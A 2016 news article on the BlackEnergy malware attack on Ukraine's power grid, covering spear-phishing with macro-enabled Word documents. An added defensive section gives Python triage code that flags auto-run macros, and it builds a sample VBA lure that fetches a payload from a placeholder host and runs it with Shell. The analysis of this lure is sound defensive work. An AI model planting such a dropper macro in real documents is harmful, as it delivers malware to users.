BlackEnergy campaign shows the dangers of spear-phishing, untrained employees, and Word's never-ending macro problem

Jan 28, 2016 13:20 GMT
BlackEnergy hackers used weaponized docs to spread their malware in Ukraine's power grid IT network

Two reports released yesterday, one by Kaspersky and one by SentinelOne, revealed more details about the malware attack on Ukraine's power grid that took place around this past Christmas.

If you've lost track amid the flood of media reports on this topic, here is how the events unfolded.

A summary of the Ukraine power grid cyber-attack(s)

Just before Christmas, Ukraine experienced blackouts in its western Ivano-Frankivsk region (Ivano-Frankivsk, Horodenka, Kalush, Dolyna, Kosiv, Tysmenytsia, Nadvirna, and Yaremche), an area under the control of the pro-EU government.

The blackouts lasted for hours, and according to the SBU, Ukraine's Security Service, they were caused by malware that infected the IT network of Prykarpattiaoblenergo, the regional power distribution company.

To make things worse, the company's staff was kept busy handling a flood of telephone calls instead of cleaning up the infected network.

Soon after the incident, ESET security researchers who analyzed some of the malware samples attributed it to the Russian-linked BlackEnergy APT (Advanced Persistent Threat, a term used for well-resourced hacking crews that carry out long-running, targeted attacks against carefully chosen strategic objectives).

The malware family used in this incident is also called BlackEnergy. It is not ICS-specific code: it began as a DDoS bot and grew into a modular toolkit whose plugins have since been deployed against organizations that run ICS/SCADA equipment, power grid operators among them.

But things didn't stop there. Just a few days ago, Ukraine also reported a similar malware incident affecting the IT network of Kiev's Boryspil international airport, although that attack was stopped before it could do any damage.

Attackers used malicious Word documents to spread the malware

Besides ESET, who first reported on this topic, two other security vendors have since examined the BlackEnergy samples. Kaspersky and SentinelOne have now each issued in-depth reports on the malware's mode of operation.

The version used in the Ukraine attack is a newer build (v3). In earlier campaigns BlackEnergy spread through CVE-2014-4114, a flaw in the Windows OLE packager (not in Office itself) that was exploited through booby-trapped PowerPoint files. For this campaign, however, the attackers switched to Word documents that need no exploit at all: they carry VBA macros and count on the victim enabling them.

As usual, these malicious Word documents reached victims through highly targeted spear-phishing campaigns, which are often very effective because each email is tailored to the individual recipient.

Once the recipient downloaded and opened the file, a notice told them to enable Word's macro feature. Macros are not a vulnerability as such; they are a legitimate scripting feature that runs arbitrary code on the machine, which is exactly why attackers have abused them for two decades and why security experts treat an unexpected "Enable Content" prompt as a red flag.

If the user did so, the system was compromised immediately: the document carried an auto-run macro (Word executes procedures such as AutoOpen or Document_Open as soon as macros are allowed) that ran a series of operations to download and install the BlackEnergy malware.
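The lure chain described above (a macro-enabled Word document, a user who clicks Enable, an auto-run procedure that fetches the payload) is something a defender can triage without opening the file in Word. The following Python is an added example and not code from the article, Kaspersky, SentinelOne or ESET: it inspects an OOXML document for a VBA part and a macro-enabled content type, decompresses the MS-OVBA module stream and looks for auto-run entry points and download-and-run calls. The sample document, its VBA source and the placeholder URL are constructed here, and the simplified vbaProject.bin layout it uses is an assumption explained in the code comments.

```python
"""Triage for macro-carrying Word documents (added example, not code from the
article or any vendor report). The sample .docm is constructed in memory and
stores the MS-OVBA compressed VBA stream directly in word/vbaProject.bin;
real Word files wrap it in an OLE compound file, so for those extract each
module stream with olefile and skip its performance-cache prefix first."""
import io
import re
import zipfile

# Procedures Word runs on its own once macros are enabled (documented Office
# behaviour; not exhaustive).
AUTO_EXEC = re.compile(rb"\b(AutoOpen|AutoExec|AutoClose|Document_Open|Document_Close)\b", re.I)
# Download-and-run primitives a macro dropper typically chains together.
SUSPICIOUS = re.compile(
    rb"\b(Shell|CreateObject|WScript\.Shell|MSXML2\.XMLHTTP|ADODB\.Stream|URLDownloadToFile)\b", re.I)
MACRO_CT = b"application/vnd.ms-word.document.macroEnabled.main+xml"


def decompress_ovba(container: bytes) -> bytes:
    """MS-OVBA 2.4.1 decompression of a VBA module's compressed source."""
    if not container or container[0] != 0x01:
        raise ValueError("missing MS-OVBA container signature 0x01")
    out, pos = bytearray(), 1
    while pos + 2 <= len(container):
        header = int.from_bytes(container[pos:pos + 2], "little")
        if (header >> 12) & 0x7 != 0b011:
            raise ValueError("bad chunk signature")
        chunk_end = min(pos + (header & 0x0FFF) + 3, len(container))
        pos, chunk_start = pos + 2, len(out)
        if not header >> 15:                  # raw chunk: 4096 bytes, no tokens
            out += container[pos:pos + 4096]
            pos = chunk_end
            continue
        while pos < chunk_end:
            flags, pos = container[pos], pos + 1
            for bit in range(8):
                if pos >= chunk_end:
                    break
                if not (flags >> bit) & 1:    # literal byte
                    out.append(container[pos])
                    pos += 1
                    continue
                token, pos = int.from_bytes(container[pos:pos + 2], "little"), pos + 2
                # Copy token: the offset/length bit split depends on how much of
                # this chunk is already decompressed (ceil(log2(done)), at least 4).
                done = len(out) - chunk_start
                bit_count = max((done - 1).bit_length(), 4)
                length = (token & (0xFFFF >> bit_count)) + 3
                offset = (token >> (16 - bit_count)) + 1
                if len(out) - offset < chunk_start:
                    raise ValueError("copy token points before chunk start")
                for _ in range(length):       # byte by byte: overlapping copies are legal
                    out.append(out[-offset])
    return bytes(out)


def scan_vba_source(src: bytes) -> dict:
    """Auto-run entry points and suspicious calls present in VBA source."""
    return {"auto_exec": sorted({m.group(1).decode() for m in AUTO_EXEC.finditer(src)}),
            "suspicious": sorted({m.group(1).decode() for m in SUSPICIOUS.finditer(src)})}


def triage(doc: bytes) -> dict:
    """Does the OOXML document carry VBA, does its content type admit it, and
    does the macro look like a download-and-run lure?"""
    report = {"has_macros": False, "macro_enabled_ct": False, "auto_exec": [], "suspicious": []}
    with zipfile.ZipFile(io.BytesIO(doc)) as zf:
        names = zf.namelist()
        if "[Content_Types].xml" in names:
            report["macro_enabled_ct"] = MACRO_CT in zf.read("[Content_Types].xml")
        for name in (n for n in names if n.lower().endswith("vbaproject.bin")):
            report["has_macros"] = True
            hits = scan_vba_source(decompress_ovba(zf.read(name)))
            report["auto_exec"] += hits["auto_exec"]
            report["suspicious"] += hits["suspicious"]
    if report["auto_exec"] and report["suspicious"]:
        report["verdict"] = "suspicious"
    else:
        report["verdict"] = "macros-present" if report["has_macros"] else "no-macros"
    return report


# Constructed lure source; the URL is a placeholder, not an indicator.
SAMPLE_VBA = b"""Attribute VB_Name = "ThisDocument"
Sub Document_Open()
    AutoOpen
End Sub
Sub AutoOpen()
    Set http = CreateObject("MSXML2.XMLHTTP")
    http.Open "GET", "http://example.invalid/payload", False
    Shell Environ("TEMP") & "\\payload.exe"
End Sub
"""


def build_sample_docm(vba_source: bytes) -> bytes:
    """Constructed .docm: a literal-only MS-OVBA container (valid, just not
    compact) as word/vbaProject.bin plus a macro-enabled content type."""
    assert len(vba_source) <= 3584, "single literal-only chunk"
    body = bytearray()
    for i in range(0, len(vba_source), 8):
        body.append(0x00)                     # flag byte: next eight tokens are literals
        body += vba_source[i:i + 8]
    header = 0x8000 | 0x3000 | (len(body) + 2 - 3)   # compressed, signature 011, size-3
    container = b"\x01" + header.to_bytes(2, "little") + bytes(body)
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("[Content_Types].xml",
                    b'<Types><Override PartName="/word/document.xml" ContentType="' + MACRO_CT + b'"/></Types>')
        zf.writestr("word/document.xml", b"<document/>")
        zf.writestr("word/vbaProject.bin", container)
    return buf.getvalue()
```

Calling `triage(build_sample_docm(SAMPLE_VBA))` returns the verdict "suspicious" together with the entry points and calls that triggered it. Against a real .docm, olevba from the oletools project does the same job with a proper OLE parser; the point here is that a VBA part plus an AutoOpen/Document_Open procedure plus a download primitive is detectable before any user ever sees the "enable macros" prompt. Disabling macros by policy (Trust Center's "Disable all macros without notification", enforceable through Group Policy) removes the user decision this lure depends on.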

From there, the reports say, the malware's plugins were used to disrupt Prykarpattiaoblenergo's ICS/SCADA systems, making equipment falter or shut down.

Sample of weaponized Word document used in the Ukraine attacks